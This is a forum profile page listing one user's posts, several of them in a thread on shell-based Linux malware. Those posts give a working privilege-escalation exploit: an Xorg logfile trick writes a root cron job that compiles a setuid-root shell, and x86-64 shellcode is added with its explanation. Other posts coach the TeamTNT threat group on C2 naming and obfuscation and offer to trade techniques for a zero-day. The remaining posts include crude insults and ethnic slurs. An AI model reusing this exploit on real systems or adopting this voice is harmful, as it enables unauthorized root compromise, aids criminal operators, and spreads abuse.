User Controls
Posts by Sophie
-
2021-09-25 at 6:07 PM UTC in Sh/Bash based malware for *Nix.It's not called exploits for nothing (n_n")
-
2021-09-25 at 6:05 PM UTC in Sh/Bash based malware for *Nix.If you look closely at this part:
cat << EOF > /tmp/x_orgasm
cp /bin/sh /usr/local/bin/pwned ##!!##_1
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
chmod 4777 /usr/local/bin/pwned
EOF
You can tell that the operation above writes out everything between EOFto the /tmp directory, after which it's made execuyable with chmod +x. That means it can be run as a shell script.
Here we are making sure that cronjob related to Xorg which has the permissions required will start the script in /tmp with the permissions we need.
cd /etc
Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
sleep 5
pkill Xorg
Once the script is executed with the new permissions we can do the operations defined there without issue.
Even if something goes wrong i write this:
global _start
section .text
_start:
push 59
pop rax
cdq
push rdx
mov rbx, 0x6363672f6e69622f
push rbx
mov rbx, 0x7273752f2f2f2f2f
push rbx
push rsp
pop rdi
push rdx
mov rbx, 0xffffffff9cd19b9a
not rbx
push rbx
mov rbx, 0x91888fd08f928bd0
not rbx
push rbx
push rsp
pop r8
push rdx
mov rbx, 0xffffffffffff90d2
not rbx
push rbx
push rsp
pop r9
push rdx
mov rbx, 0xffffffff9b9a9188
not rbx
push rbx
mov rbx, 0x8fd091969dd0939e
not rbx
push rbx
mov rbx, 0x9c9093d08d8c8ad0
not rbx
push rbx
push rsp
pop r10
push rdx
push rsp
pop rdx
push r10
push r9
push r8
push rdi
push rsp
pop rsi
syscall
What that does is invoke gcc with execve with UID 0, so the shell we wrote out with
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gets compiled the way we want to regardless of system permissions. -
2021-09-25 at 4:48 PM UTC in Sh/Bash based malware for *Nix.
-
2021-09-25 at 4:23 PM UTC in Sh/Bash based malware for *Nix.Also TeamTNT, if you're reading this. Don't download your payloads from a C2 server that literally has the name of the Operation in the domain. And, you guys need to obfuscate that shell script. I got a couple really good ways among my TTPs but if i share them they won't be as effective any more.
I can design a new Obfuscation method however. And you guys should be able to as well, if you can't i'll trade a custom designed method, for something of equal value. Preferably 0day. Ok admittedly that's a steep price.
All of this is for legitimate research purposes of course.
edit: Oops * shell script not shell code lol -
2021-09-25 at 4:11 PM UTC in Sh/Bash based malware for *Nix.
-
2021-09-25 at 1:12 PM UTC in Sh/Bash based malware for *Nix.I'm an inspiration to Threat Actors all around the world.
https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera
Sh/Bash based malware is the future of loonix malware. Using native utils for offensive operations is almost always superior to shipping in a whole ass malware, especially with regards to Linux, no compatibility issues. It's great. -
2021-09-22 at 4:34 AM UTC in Why has this place become Who's on FirstWell Totse Quick Mix 9000 i try to do my part, with threads about splosives and writing about some of the cyber shenanigans i get up to in T&T.
But those are just genuine interests. You could even say passions especially as far as the computer science stuff is concerned. -
2021-09-22 at 4:30 AM UTC in In a few more years New Zealand will cease to exist.
-
2021-09-22 at 4:25 AM UTC in Do you spit shine yer shooz?The only shoes i own that need shining are leather Hugo Boss shoes and my dress shoes that i wear if i have to wear a suit and tie. Them's the typa shoes you don't just shine with spit. You use special polish.
-
2021-09-22 at 4:13 AM UTC in Too bad devils can’t die in a fireDying in a blaze of glory huh? Make sure it's an infernal fire storm.
-
2021-09-22 at 12:02 AM UTC in Am I the God or the Devil?You're just some loser. Thinking you are God or the Devil for that matter is a level of narcissism hard to comprehend. Sure you can have a high opinion of yourself, but you have never in your life done a single thing that would even warrant being proud of. Let alone thinking you are God.
Your only accomplishment in life is not having died from complications die to alcoholism. -
2021-09-20 at 9:07 AM UTC in I had another weird dream. explain this to mePiss boner? Is that an old man prostate thing? It's obviously different to morning wood. Anyway, surface level would suggest you have some inner turmoil considering your views on your own masculinity.
-
2021-09-20 at 9:02 AM UTC in Its a little bit funny guys (about older women)You're really overcompensating for your noncery.
-
2021-09-20 at 8:20 AM UTC in tunnel boring activity at walmart?Didn't know they sold kids at Walmart. How convenient.
-
2021-09-20 at 8:12 AM UTC in It's smile cookie seasonDo you have experience with this Vinnie?
-
2021-09-20 at 8:08 AM UTC in It's smile cookie season
-
2021-09-20 at 7:51 AM UTC in Option to disable thanks feature
-
2021-09-20 at 7:49 AM UTC in Panic attacks
-
2021-09-20 at 7:47 AM UTC in Panic attacksHey Grylls, what typa foreign are you? you look like an AY-rab to me.
-
2021-09-20 at 7:46 AM UTC in Fona 9-19-2021